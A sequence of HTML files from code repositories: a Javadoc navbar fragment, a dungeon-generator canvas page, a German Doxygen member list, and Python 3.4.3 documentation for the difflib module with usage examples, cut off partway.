</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../Cliente/package-summary.html">PREV PACKAGE</a></li>
<li><a href="../Main/package-summary.html">NEXT PACKAGE</a></li>
</ul>
<ul class="navList">
<li><a href="../index.html?interfaz/package-summary.html" target="_top">FRAMES</a></li>
<li><a href="package-summary.html" target="_top">NO FRAMES</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
app/index.html | EduardoLopes/BSP-Dungeon-Generation-Study | <html>
<head>
<meta charset="UTF-8">
<title>Dungeon Generator</title>
<style>
canvas{
position: absolute;
left: 0;
right: 0;
top: 0;
bottom: 0;
margin: auto;
}
</style>
</head>
<body>
<canvas id="canvas"></canvas>
<!--<script src=//cdnjs.cloudflare.com/ajax/libs/seedrandom/2.3.11/seedrandom.min.js></script>-->
<script src="js/random.min.js"></script>
<script>
//var r = new Random(Random.engines.mt19937().seed('hello'));
</script>
<script src="bundle.js"></script>
</body>
</html>
|
doc/Doxygen/html/da/db5/structyy__trans__info-members.html | keinstein/mutabor | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<title>Elementverzeichnis</title>
<link href="../../doxygen.css" rel="stylesheet" type="text/css">
</head><body>
<!-- Erzeugt von Doxygen 1.8.13 -->
<script type="text/javascript" src="../../menudata.js"></script>
<script type="text/javascript" src="../../menu.js"></script>
<script type="text/javascript">
$(function() {
initMenu('../../',false,false,'search.php','Suchen');
});
</script>
<div id="main-nav"></div>
</div><!-- top -->
<div class="header">
<div class="headertitle">
<div class="title">yy_trans_info Elementverzeichnis</div> </div>
</div><!--header-->
<div class="contents">
<p>Vollständige Aufstellung aller Elemente für <a class="el" href="../../d9/deb/structyy__trans__info.html">yy_trans_info</a> einschließlich aller geerbten Elemente.</p>
<table class="directory">
<tr class="even"><td class="entry"><a class="el" href="../../d9/deb/structyy__trans__info.html#ae0715250c2bef261e596e77e0030f13e">yy_nxt</a></td><td class="entry"><a class="el" href="../../d9/deb/structyy__trans__info.html">yy_trans_info</a></td><td class="entry"></td></tr>
<tr><td class="entry"><a class="el" href="../../d9/deb/structyy__trans__info.html#a5c9f61e770deef50bd4e697310342fe9">yy_verify</a></td><td class="entry"><a class="el" href="../../d9/deb/structyy__trans__info.html">yy_trans_info</a></td><td class="entry"></td></tr>
</table></div><!-- contents -->
<hr size="1"><address style="align: right;"><small>
Erzeugt am Sam Sep 15 2018 14:57:56 für Mutabor von <a href="http://www.doxygen.org/index.html"><img src="doxygen.png" alt="doxygen" align="middle" border="0"></a> 1.8.13</small></address>
</body>
</html>
|
live-build-config/config/includes.chroot/usr/share/documentation/python/3.4.3/library/difflib.html | cybint-io/cybint-linux | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>6.3. difflib — Helpers for computing deltas — Python 3.4.3 documentation</title>
<link rel="stylesheet" href="../_static/pydoctheme.css" type="text/css" />
<link rel="stylesheet" href="../_static/pygments.css" type="text/css" />
<script type="text/javascript">
var DOCUMENTATION_OPTIONS = {
URL_ROOT: '../',
VERSION: '3.4.3',
COLLAPSE_INDEX: false,
FILE_SUFFIX: '.html',
HAS_SOURCE: true
};
</script>
<script type="text/javascript" src="../_static/jquery.js"></script>
<script type="text/javascript" src="../_static/underscore.js"></script>
<script type="text/javascript" src="../_static/doctools.js"></script>
<script type="text/javascript" src="../_static/sidebar.js"></script>
<link rel="search" type="application/opensearchdescription+xml"
title="Search within Python 3.4.3 documentation"
href="../_static/opensearch.xml"/>
<link rel="author" title="About these documents" href="../about.html" />
<link rel="copyright" title="Copyright" href="../copyright.html" />
<link rel="top" title="Python 3.4.3 documentation" href="../index.html" />
<link rel="up" title="6. Text Processing Services" href="text.html" />
<link rel="next" title="6.4. textwrap — Text wrapping and filling" href="textwrap.html" />
<link rel="prev" title="6.2. re — Regular expression operations" href="re.html" />
<link rel="shortcut icon" type="image/png" href="../_static/py.png" />
<script type="text/javascript" src="../_static/copybutton.js"></script>
<script type="text/javascript" src="../_static/version_switch.js"></script>
</head>
<body>
<div class="related">
<h3>Navigation</h3>
<ul>
<li class="right" style="margin-right: 10px">
<a href="../genindex.html" title="General Index"
accesskey="I">index</a></li>
<li class="right" >
<a href="../py-modindex.html" title="Python Module Index"
>modules</a> |</li>
<li class="right" >
<a href="textwrap.html" title="6.4. textwrap — Text wrapping and filling"
accesskey="N">next</a> |</li>
<li class="right" >
<a href="re.html" title="6.2. re — Regular expression operations"
accesskey="P">previous</a> |</li>
<li><img src="../_static/py.png" alt=""
style="vertical-align: middle; margin-top: -1px"/></li>
<li><a href="https://www.python.org/">Python</a> »</li>
<li>
<span class="version_switcher_placeholder">3.4.3</span>
<a href="../index.html">Documentation</a> »
</li>
<li><a href="index.html" >The Python Standard Library</a> »</li>
<li><a href="text.html" accesskey="U">6. Text Processing Services</a> »</li>
</ul>
</div>
<div class="document">
<div class="documentwrapper">
<div class="bodywrapper">
<div class="body">
<div class="section" id="module-difflib">
<span id="difflib-helpers-for-computing-deltas"></span><h1>6.3. <a class="reference internal" href="#module-difflib" title="difflib: Helpers for computing differences between objects."><tt class="xref py py-mod docutils literal"><span class="pre">difflib</span></tt></a> — Helpers for computing deltas<a class="headerlink" href="#module-difflib" title="Permalink to this headline">¶</a></h1>
<p>This module provides classes and functions for comparing sequences. It
can be used for example, for comparing files, and can produce difference
information in various formats, including HTML and context and unified
diffs. For comparing directories and files, see also, the <a class="reference internal" href="filecmp.html#module-filecmp" title="filecmp: Compare files efficiently."><tt class="xref py py-mod docutils literal"><span class="pre">filecmp</span></tt></a> module.</p>
<dl class="class">
<dt id="difflib.SequenceMatcher">
<em class="property">class </em><tt class="descclassname">difflib.</tt><tt class="descname">SequenceMatcher</tt><a class="headerlink" href="#difflib.SequenceMatcher" title="Permalink to this definition">¶</a></dt>
<dd><p>This is a flexible class for comparing pairs of sequences of any type, so long
as the sequence elements are <a class="reference internal" href="../glossary.html#term-hashable"><em class="xref std std-term">hashable</em></a>. The basic algorithm predates, and is a
little fancier than, an algorithm published in the late 1980’s by Ratcliff and
Obershelp under the hyperbolic name “gestalt pattern matching.” The idea is to
find the longest contiguous matching subsequence that contains no “junk”
elements (the Ratcliff and Obershelp algorithm doesn’t address junk). The same
idea is then applied recursively to the pieces of the sequences to the left and
to the right of the matching subsequence. This does not yield minimal edit
sequences, but does tend to yield matches that “look right” to people.</p>
<p><strong>Timing:</strong> The basic Ratcliff-Obershelp algorithm is cubic time in the worst
case and quadratic time in the expected case. <a class="reference internal" href="#difflib.SequenceMatcher" title="difflib.SequenceMatcher"><tt class="xref py py-class docutils literal"><span class="pre">SequenceMatcher</span></tt></a> is
quadratic time for the worst case and has expected-case behavior dependent in a
complicated way on how many elements the sequences have in common; best case
time is linear.</p>
<p><strong>Automatic junk heuristic:</strong> <a class="reference internal" href="#difflib.SequenceMatcher" title="difflib.SequenceMatcher"><tt class="xref py py-class docutils literal"><span class="pre">SequenceMatcher</span></tt></a> supports a heuristic that
automatically treats certain sequence items as junk. The heuristic counts how many
times each individual item appears in the sequence. If an item’s duplicates (after
the first one) account for more than 1% of the sequence and the sequence is at least
200 items long, this item is marked as “popular” and is treated as junk for
the purpose of sequence matching. This heuristic can be turned off by setting
the <tt class="docutils literal"><span class="pre">autojunk</span></tt> argument to <tt class="docutils literal"><span class="pre">False</span></tt> when creating the <a class="reference internal" href="#difflib.SequenceMatcher" title="difflib.SequenceMatcher"><tt class="xref py py-class docutils literal"><span class="pre">SequenceMatcher</span></tt></a>.</p>
<div class="versionadded">
<p><span class="versionmodified">New in version 3.2: </span>The <em>autojunk</em> parameter.</p>
</div>
</dd></dl>
<dl class="class">
<dt id="difflib.Differ">
<em class="property">class </em><tt class="descclassname">difflib.</tt><tt class="descname">Differ</tt><a class="headerlink" href="#difflib.Differ" title="Permalink to this definition">¶</a></dt>
<dd><p>This is a class for comparing sequences of lines of text, and producing
human-readable differences or deltas. Differ uses <a class="reference internal" href="#difflib.SequenceMatcher" title="difflib.SequenceMatcher"><tt class="xref py py-class docutils literal"><span class="pre">SequenceMatcher</span></tt></a>
both to compare sequences of lines, and to compare sequences of characters
within similar (near-matching) lines.</p>
<p>Each line of a <a class="reference internal" href="#difflib.Differ" title="difflib.Differ"><tt class="xref py py-class docutils literal"><span class="pre">Differ</span></tt></a> delta begins with a two-letter code:</p>
<table border="1" class="docutils">
<colgroup>
<col width="19%" />
<col width="81%" />
</colgroup>
<thead valign="bottom">
<tr class="row-odd"><th class="head">Code</th>
<th class="head">Meaning</th>
</tr>
</thead>
<tbody valign="top">
<tr class="row-even"><td><tt class="docutils literal"><span class="pre">'-</span> <span class="pre">'</span></tt></td>
<td>line unique to sequence 1</td>
</tr>
<tr class="row-odd"><td><tt class="docutils literal"><span class="pre">'+</span> <span class="pre">'</span></tt></td>
<td>line unique to sequence 2</td>
</tr>
<tr class="row-even"><td><tt class="docutils literal"><span class="pre">'</span> <span class="pre">'</span></tt></td>
<td>line common to both sequences</td>
</tr>
<tr class="row-odd"><td><tt class="docutils literal"><span class="pre">'?</span> <span class="pre">'</span></tt></td>
<td>line not present in either input sequence</td>
</tr>
</tbody>
</table>
<p>Lines beginning with ‘<tt class="docutils literal"><span class="pre">?</span></tt>‘ attempt to guide the eye to intraline differences,
and were not present in either input sequence. These lines can be confusing if
the sequences contain tab characters.</p>
</dd></dl>
<dl class="class">
<dt id="difflib.HtmlDiff">
<em class="property">class </em><tt class="descclassname">difflib.</tt><tt class="descname">HtmlDiff</tt><a class="headerlink" href="#difflib.HtmlDiff" title="Permalink to this definition">¶</a></dt>
<dd><p>This class can be used to create an HTML table (or a complete HTML file
containing the table) showing a side by side, line by line comparison of text
with inter-line and intra-line change highlights. The table can be generated in
either full or contextual difference mode.</p>
<p>The constructor for this class is:</p>
<dl class="method">
<dt id="difflib.HtmlDiff.__init__">
<tt class="descname">__init__</tt><big>(</big><em>tabsize=8</em>, <em>wrapcolumn=None</em>, <em>linejunk=None</em>, <em>charjunk=IS_CHARACTER_JUNK</em><big>)</big><a class="headerlink" href="#difflib.HtmlDiff.__init__" title="Permalink to this definition">¶</a></dt>
<dd><p>Initializes instance of <a class="reference internal" href="#difflib.HtmlDiff" title="difflib.HtmlDiff"><tt class="xref py py-class docutils literal"><span class="pre">HtmlDiff</span></tt></a>.</p>
<p><em>tabsize</em> is an optional keyword argument to specify tab stop spacing and
defaults to <tt class="docutils literal"><span class="pre">8</span></tt>.</p>
<p><em>wrapcolumn</em> is an optional keyword to specify column number where lines are
broken and wrapped, defaults to <tt class="docutils literal"><span class="pre">None</span></tt> where lines are not wrapped.</p>
<p><em>linejunk</em> and <em>charjunk</em> are optional keyword arguments passed into <tt class="docutils literal"><span class="pre">ndiff()</span></tt>
(used by <a class="reference internal" href="#difflib.HtmlDiff" title="difflib.HtmlDiff"><tt class="xref py py-class docutils literal"><span class="pre">HtmlDiff</span></tt></a> to generate the side by side HTML differences). See
<tt class="docutils literal"><span class="pre">ndiff()</span></tt> documentation for argument default values and descriptions.</p>
</dd></dl>
<p>The following methods are public:</p>
<dl class="method">
<dt id="difflib.HtmlDiff.make_file">
<tt class="descname">make_file</tt><big>(</big><em>fromlines</em>, <em>tolines</em>, <em>fromdesc=''</em>, <em>todesc=''</em>, <em>context=False</em>, <em>numlines=5</em><big>)</big><a class="headerlink" href="#difflib.HtmlDiff.make_file" title="Permalink to this definition">¶</a></dt>
<dd><p>Compares <em>fromlines</em> and <em>tolines</em> (lists of strings) and returns a string which
is a complete HTML file containing a table showing line by line differences with
inter-line and intra-line changes highlighted.</p>
<p><em>fromdesc</em> and <em>todesc</em> are optional keyword arguments to specify from/to file
column header strings (both default to an empty string).</p>
<p><em>context</em> and <em>numlines</em> are both optional keyword arguments. Set <em>context</em> to
<tt class="docutils literal"><span class="pre">True</span></tt> when contextual differences are to be shown, else the default is
<tt class="docutils literal"><span class="pre">False</span></tt> to show the full files. <em>numlines</em> defaults to <tt class="docutils literal"><span class="pre">5</span></tt>. When <em>context</em>
is <tt class="docutils literal"><span class="pre">True</span></tt> <em>numlines</em> controls the number of context lines which surround the
difference highlights. When <em>context</em> is <tt class="docutils literal"><span class="pre">False</span></tt> <em>numlines</em> controls the
number of lines which are shown before a difference highlight when using the
“next” hyperlinks (setting to zero would cause the “next” hyperlinks to place
the next difference highlight at the top of the browser without any leading
context).</p>
</dd></dl>
<dl class="method">
<dt id="difflib.HtmlDiff.make_table">
<tt class="descname">make_table</tt><big>(</big><em>fromlines</em>, <em>tolines</em>, <em>fromdesc=''</em>, <em>todesc=''</em>, <em>context=False</em>, <em>numlines=5</em><big>)</big><a class="headerlink" href="#difflib.HtmlDiff.make_table" title="Permalink to this definition">¶</a></dt>
<dd><p>Compares <em>fromlines</em> and <em>tolines</em> (lists of strings) and returns a string which
is a complete HTML table showing line by line differences with inter-line and
intra-line changes highlighted.</p>
<p>The arguments for this method are the same as those for the <a class="reference internal" href="#difflib.HtmlDiff.make_file" title="difflib.HtmlDiff.make_file"><tt class="xref py py-meth docutils literal"><span class="pre">make_file()</span></tt></a>
method.</p>
</dd></dl>
<p><tt class="file docutils literal"><span class="pre">Tools/scripts/diff.py</span></tt> is a command-line front-end to this class and
contains a good example of its use.</p>
</dd></dl>
<dl class="function">
<dt id="difflib.context_diff">
<tt class="descclassname">difflib.</tt><tt class="descname">context_diff</tt><big>(</big><em>a</em>, <em>b</em>, <em>fromfile=''</em>, <em>tofile=''</em>, <em>fromfiledate=''</em>, <em>tofiledate=''</em>, <em>n=3</em>, <em>lineterm='\n'</em><big>)</big><a class="headerlink" href="#difflib.context_diff" title="Permalink to this definition">¶</a></dt>
<dd><p>Compare <em>a</em> and <em>b</em> (lists of strings); return a delta (a <a class="reference internal" href="../glossary.html#term-generator"><em class="xref std std-term">generator</em></a>
generating the delta lines) in context diff format.</p>
<p>Context diffs are a compact way of showing just the lines that have changed plus
a few lines of context. The changes are shown in a before/after style. The
number of context lines is set by <em>n</em> which defaults to three.</p>
<p>By default, the diff control lines (those with <tt class="docutils literal"><span class="pre">***</span></tt> or <tt class="docutils literal"><span class="pre">---</span></tt>) are created
with a trailing newline. This is helpful so that inputs created from
<a class="reference internal" href="io.html#io.IOBase.readlines" title="io.IOBase.readlines"><tt class="xref py py-func docutils literal"><span class="pre">io.IOBase.readlines()</span></tt></a> result in diffs that are suitable for use with
<a class="reference internal" href="io.html#io.IOBase.writelines" title="io.IOBase.writelines"><tt class="xref py py-func docutils literal"><span class="pre">io.IOBase.writelines()</span></tt></a> since both the inputs and outputs have trailing
newlines.</p>
<p>For inputs that do not have trailing newlines, set the <em>lineterm</em> argument to
<tt class="docutils literal"><span class="pre">""</span></tt> so that the output will be uniformly newline free.</p>
<p>The context diff format normally has a header for filenames and modification
times. Any or all of these may be specified using strings for <em>fromfile</em>,
<em>tofile</em>, <em>fromfiledate</em>, and <em>tofiledate</em>. The modification times are normally
expressed in the ISO 8601 format. If not specified, the
strings default to blanks.</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="gp">>>> </span><span class="n">s1</span> <span class="o">=</span> <span class="p">[</span><span class="s">'bacon</span><span class="se">\n</span><span class="s">'</span><span class="p">,</span> <span class="s">'eggs</span><span class="se">\n</span><span class="s">'</span><span class="p">,</span> <span class="s">'ham</span><span class="se">\n</span><span class="s">'</span><span class="p">,</span> <span class="s">'guido</span><span class="se">\n</span><span class="s">'</span><span class="p">]</span>
<span class="gp">>>> </span><span class="n">s2</span> <span class="o">=</span> <span class="p">[</span><span class="s">'python</span><span class="se">\n</span><span class="s">'</span><span class="p">,</span> <span class="s">'eggy</span><span class="se">\n</span><span class="s">'</span><span class="p">,</span> <span class="s">'hamster</span><span class="se">\n</span><span class="s">'</span><span class="p">,</span> <span class="s">'guido</span><span class="se">\n</span><span class="s">'</span><span class="p">]</span>
<span class="gp">>>> </span><span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">context_diff</span><span class="p">(</span><span class="n">s1</span><span class="p">,</span> <span class="n">s2</span><span class="p">,</span> <span class="n">fromfile</span><span class="o">=</span><span class="s">'before.py'</span><span class="p">,</span> <span class="n">tofile</span><span class="o">=</span><span class="s">'after.py'</span><span class="p">):</span>
<span class="gp">... </span> <span class="n">sys</span><span class="o">.</span><span class="n">stdout</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
<span class="go">*** before.py</span>
<span class="go">--- after.py</span>
<span class="go">***************</span>
<span class="go">*** 1,4 ****</span>
<span class="go">! bacon</span>
<span class="go">! eggs</span>
<span class="go">! ham</span>
<span class="go"> guido</span>
<span class="go">--- 1,4 ----</span>
<span class="go">! python</span>
<span class="go">! eggy</span>
<span class="go">! hamster</span>
<span class="go"> guido</span>
</pre></div>
</div>
<p>See <a class="reference internal" href="#difflib-interface"><em>A command-line interface to difflib</em></a> for a more detailed example.</p>
</dd></dl>
<dl class="function">
<dt id="difflib.get_close_matches">
<tt class="descclassname">difflib.</tt><tt class="descname">get_close_matches</tt><big>(</big><em>word</em>, <em>possibilities</em>, <em>n=3</em>, <em>cutoff=0.6</em><big>)</big><a class="headerlink" href="#difflib.get_close_matches" title="Permalink to this definition">¶</a></dt>
<dd><p>Return a list of the best “good enough” matches. <em>word</em> is a sequence for which
close matches are desired (typically a string), and <em>possibilities</em> is a list of
sequences against which to match <em>word</em> (typically a list of strings).</p>
<p>Optional argument <em>n</em> (default <tt class="docutils literal"><span class="pre">3</span></tt>) is the maximum number of close matches to
return; <em>n</em> must be greater than <tt class="docutils literal"><span class="pre">0</span></tt>.</p>
<p>Optional argument <em>cutoff</em> (default <tt class="docutils literal"><span class="pre">0.6</span></tt>) is a float in the range [0, 1].
Possibilities that don’t score at least that similar to <em>word</em> are ignored.</p>
<p>The best (no more than <em>n</em>) matches among the possibilities are returned in a
list, sorted by similarity score, most similar first.</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="gp">>>> </span><span class="n">get_close_matches</span><span class="p">(</span><span class="s">'appel'</span><span class="p">,</span> <span class="p">[</span><span class="s">'ape'</span><span class="p">,</span> <span class="s">'apple'</span><span class="p">,</span> <span class="s">'peach'</span><span class="p">,</span> <span class="s">'puppy'</span><span class="p">])</span>
<span class="go">['apple', 'ape']</span>
<span class="gp">>>> </span><span class="kn">import</span> <span class="nn">keyword</span>
<span class="gp">>>> </span><span class="n">get_close_matches</span><span class="p">(</span><span class="s">'wheel'</span><span class="p">,</span> <span class="n">keyword</span><span class="o">.</span><span class="n">kwlist</span><span class="p">)</span>
<span class="go">['while']</span>
<span class="gp">>>> </span><span class="n">get_close_matches</span><span class="p">(</span><span class="s">'apple'</span><span class="p">,</span> <span class="n">keyword</span><span class="o">.</span><span class="n">kwlist</span><span class="p">)</span>
<span class="go">[]</span>
<span class="gp">>>> </span><span class="n">get_close_matches</span><span class="p">(</span><span class="s">'accept'</span><span class="p">,</span> <span class="n">keyword</span><span class="o">.</span><span class="n">kwlist</span><span class="p">)</span>
<span class="go">['except']</span>
</pre></div>
</div>
</dd></dl>
<dl class="function">
<dt id="difflib.ndiff">
<tt class="descclassname">difflib.</tt><tt class="descname">ndiff</tt><big>(</big><em>a</em>, <em>b</em>, <em>linejunk=None</em>, <em>charjunk=IS_CHARACTER_JUNK</em><big>)</big><a class="headerlink" href="#difflib.ndiff" title="Permalink to this definition">¶</a></dt>
<dd><p>Compare <em>a</em> and <em>b</em> (lists of strings); return a <a class="reference internal" href="#difflib.Differ" title="difflib.Differ"><tt class="xref py py-class docutils literal"><span class="pre">Differ</span></tt></a>-style
delta (a <a class="reference internal" href="../glossary.html#term-generator"><em class="xref std std-term">generator</em></a> generating the delta lines).</p>
<p>Optional keyword parameters <em>linejunk</em> and <em>charjunk</em> are for filter functions
(or <tt class="docutils literal"><span class="pre">None</span></tt>):</p>
<p><em>linejunk</em>: A function that accepts a single string argument, and returns
true if the string is junk, or false if not. The default is <tt class="docutils literal"><span class="pre">None</span></tt>. There
is also a module-level function <a class="reference internal" href="#difflib.IS_LINE_JUNK" title="difflib.IS_LINE_JUNK"><tt class="xref py py-func docutils literal"><span class="pre">IS_LINE_JUNK()</span></tt></a>, which filters out lines
without visible characters, except for at most one pound character (<tt class="docutils literal"><span class="pre">'#'</span></tt>)
– however the underlying <a class="reference internal" href="#difflib.SequenceMatcher" title="difflib.SequenceMatcher"><tt class="xref py py-class docutils literal"><span class="pre">SequenceMatcher</span></tt></a> class does a dynamic
analysis of which lines are so frequent as to constitute noise, and this
usually works better than using this function.</p>
<p><em>charjunk</em>: A function that accepts a character (a string of length 1), and
returns if the character is junk, or false if not. The default is module-level
function <a class="reference internal" href="#difflib.IS_CHARACTER_JUNK" title="difflib.IS_CHARACTER_JUNK"><tt class="xref py py-func docutils literal"><span class="pre">IS_CHARACTER_JUNK()</span></tt></a>, which filters out whitespace characters (a
blank or tab; note: bad idea to include newline in this!).</p>
<p><tt class="file docutils literal"><span class="pre">Tools/scripts/ndiff.py</span></tt> is a command-line front-end to this function.</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="gp">>>> </span><span class="n">diff</span> <span class="o">=</span> <span class="n">ndiff</span><span class="p">(</span><span class="s">'one</span><span class="se">\n</span><span class="s">two</span><span class="se">\n</span><span class="s">three</span><span class="se">\n</span><span class="s">'</span><span class="o">.</span><span class="n">splitlines</span><span class="p">(</span><span class="n">keepends</span><span class="o">=</span><span class="k">True</span><span class="p">),</span>
<span class="gp">... </span> <span class="s">'ore</span><span class="se">\n</span><span class="s">tree</span><span class="se">\n</span><span class="s">emu</span><span class="se">\n</span><span class="s">'</span><span class="o">.</span><span class="n">splitlines</span><span class="p">(</span><span class="n">keepends</span><span class="o">=</span><span class="k">True</span><span class="p">))</span>
<span class="gp">>>> </span><span class="nb">print</span><span class="p">(</span><span class="s">''</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">diff</span><span class="p">),</span> <span class="n">end</span><span class="o">=</span><span class="s">""</span><span class="p">)</span>
<span class="go">- one</span>
<span class="go">? ^</span>
<span class="go">+ ore</span>
<span class="go">? ^</span>
<span class="go">- two</span>
<span class="go">- three</span>
<span class="go">? -</span>
<span class="go">+ tree</span>
<span class="go">+ emu</span>
</pre></div>
</div>
</dd></dl>
<dl class="function">
<dt id="difflib.restore">
<tt class="descclassname">difflib.</tt><tt class="descname">restore</tt><big>(</big><em>sequence</em>, <em>which</em><big>)</big><a class="headerlink" href="#difflib.restore" title="Permalink to this definition">¶</a></dt>
<dd><p>Return one of the two sequences that generated a delta.</p>
<p>Given a <em>sequence</em> produced by <a class="reference internal" href="#difflib.Differ.compare" title="difflib.Differ.compare"><tt class="xref py py-meth docutils literal"><span class="pre">Differ.compare()</span></tt></a> or <a class="reference internal" href="#difflib.ndiff" title="difflib.ndiff"><tt class="xref py py-func docutils literal"><span class="pre">ndiff()</span></tt></a>, extract
lines originating from file 1 or 2 (parameter <em>which</em>), stripping off line
prefixes.</p>
<p>Example:</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="gp">>>> </span><span class="n">diff</span> <span class="o">=</span> <span class="n">ndiff</span><span class="p">(</span><span class="s">'one</span><span class="se">\n</span><span class="s">two</span><span class="se">\n</span><span class="s">three</span><span class="se">\n</span><span class="s">'</span><span class="o">.</span><span class="n">splitlines</span><span class="p">(</span><span class="n">keepends</span><span class="o">=</span><span class="k">True</span><span class="p">),</span>
<span class="gp">... </span> <span class="s">'ore</span><span class="se">\n</span><span class="s">tree</span><span class="se">\n</span><span class="s">emu</span><span class="se">\n</span><span class="s">'</span><span class="o">.</span><span class="n">splitlines</span><span class="p">(</span><span class="n">keepends</span><span class="o">=</span><span class="k">True</span><span class="p">))</span>
<span class="gp">>>> </span><span class="n">diff</span> <span class="o">=</span> <span class="nb">list</span><span class="p">(</span><span class="n">diff</span><span class="p">)</span> <span class="c"># materialize the generated delta into a list</span>
<span class="gp">>>> </span><span class="nb">print</span><span class="p">(</span><span class="s">''</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">restore</span><span class="p">(</span><span class="n">diff</span><span class="p">,</span> <span class="mi">1</span><span class="p">)),</span> <span class="n">end</span><span class="o">=</span><span class="s">""</span><span class="p">)</span>
<span class="go">one</span>
<span class="go">two</span>
<span class="go">three</span>
<span class="gp">>>> </span><span class="nb">print</span><span class="p">(</span><span class="s">''</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">restore</span><span class="p">(</span><span class="n">diff</span><span class="p">,</span> <span class="mi">2</span><span class="p">)),</span> <span class="n">end</span><span class="o">=</span><span class="s">""</span><span class="p">)</span>
<span class="go">ore</span>
<span class="go">tree</span>
<span class="go">emu</span>
</pre></div>
</div>
</dd></dl>
<dl class="function">
<dt id="difflib.unified_diff">
<tt class="descclassname">difflib.</tt><tt class="descname">unified_diff</tt><big>(</big><em>a</em>, <em>b</em>, <em>fromfile=''</em>, <em>tofile=''</em>, <em>fromfiledate=''</em>, <em>tofiledate=''</em>, <em>n=3</em>, <em>lineterm='\n'</em><big>)</big><a class="headerlink" href="#difflib.unified_diff" title="Permalink to this definition">¶</a></dt>
<dd><p>Compare <em>a</em> and <em>b</em> (lists of strings); return a delta (a <a class="reference internal" href="../glossary.html#term-generator"><em class="xref std std-term">generator</em></a>
generating the delta lines) in unified diff format.</p>
<p>Unified diffs are a compact way of showing just the lines that have changed plus
a few lines of context. The changes are shown in a inline style (instead of
separate before/after blocks). The number of context lines is set by <em>n</em> which
defaults to three.</p>
<p>By default, the diff control lines (those with <tt class="docutils literal"><span class="pre">---</span></tt>, <tt class="docutils literal"><span class="pre">+++</span></tt>, or <tt class="docutils literal"><span class="pre">@@</span></tt>) are
created with a trailing newline. This is helpful so that inputs created from
<a class="reference internal" href="io.html#io.IOBase.readlines" title="io.IOBase.readlines"><tt class="xref py py-func docutils literal"><span class="pre">io.IOBase.readlines()</span></tt></a> result in diffs that are suitable for use with
<a class="reference internal" href="io.html#io.IOBase.writelines" title="io.IOBase.writelines"><tt class="xref py py-func docutils literal"><span class="pre">io.IOBase.writelines()</span></tt></a> since both the inputs and outputs have trailing
newlines.</p>
<p>For inputs that do not have trailing newlines, set the <em>lineterm</em> argument to
<tt class="docutils literal"><span class="pre">""</span></tt> so that the output will be uniformly newline free.</p>
<p>The context diff format normally has a header for filenames and modification
times. Any or all of these may be specified using strings for <em>fromfile</em>,
<em>tofile</em>, <em>fromfiledate</em>, and <em>tofiledate</em>. The modification times are normally
expressed in the ISO 8601 format. If not specified, the
strings default to blanks.</p>
<div class="highlight-python3"><div class="highlight"><pre><span class="gp">>>> </span><span class="n">s1</span> <span class="o">=</span> <span class="p">[</span><span class="s">'bacon</span><span class="se">\n</span><span class="s">'</span><span class="p">,</span> <span class="s">'eggs</span><span class="se">\n</span><span class="s">'</span><span class="p">,</span> <span class="s">'ham</span><span class="se">\n</span><span class="s">'</span><span class="p">,</span> <span class="s">'guido</span><span class="se">\n</span><span class="s">'</span><span class="p">]</span>
<span class="gp">>>> </span><span class="n">s2</span> <span class="o">=</span> <span class="p">[</span><span class="s">'python</span><span class="se">\n</span><span class="s">'</span><span class="p">,</span> <span class="s">'eggy</span><span class="se">\n</span><span class="s">'</span><span class="p">,</span> <span class="s">'hamster</span><span class="se">\n</span><span class="s">'</span><span class="p">,</span> <span class="s">'guido</span><span class="se">\n</span><span class="s">'</span><span class="p">]</span>
<span class="gp">>>> </span><span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">unified_diff</span><span class="p">(</span><span class="n">s1</span><span class="p">,</span> <span class="n">s2</span><span class="p">,</span> <span class="n">fromfile</span><span class="o">=</span><span class="s">'before.py'</span><span class="p">,</span> <span class="n">tofile</span><span class="o">=</span><span class="s">'after.py'</span><span class="p">):</span>
<span class="gp">... </span> <span class="n">sys</span><span class="o">.</span><span class="n">stdout</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
<span class="go">--- before.py</span>
<span class="go">+++ after.py</span>
<span class="go">@@ -1,4 +1,4 @@</span>
<span class="go">-bacon</span>
<span class="go">-eggs</span>
<span class="go">-ham</span>
<span class="go">+python</span>
<span class="go">+eggy</span>
<span class="go">+hamster</span>
<span class="go"> guido</span>
</pre></div>
</div>
<p>See <a class="reference internal" href="#difflib-interface"><em>A command-line interface to difflib</em></a> for a more detailed example.</p>
</dd></dl>
<dl class="function">
<dt id="difflib.IS_LINE_JUNK">
<tt class="descclassname">difflib.</tt><tt class="descname">IS_LINE_JUNK</tt><big>(</big><em>line</em><big>)</big><a class="headerlink" href="#difflib.IS_LINE_JUNK" title="Permalink to this definition">¶</a></dt>
<dd><p>Return true for ignorable lines. The line <em>line</em> is ignorable if <em>line</em> is
blank or contains a single <tt class="docutils literal"><span class="pre">'#'</span></tt>, otherwise it is not ignorable. Used as a
default for parameter <em>linejunk</em> in <a class="reference internal" href="#difflib.ndiff" title="difflib.ndiff"><tt class="xref py py-func docutils literal"><span class="pre">ndiff()</span></tt></a> in older versions.</p>
</dd></dl>
<dl class="function">
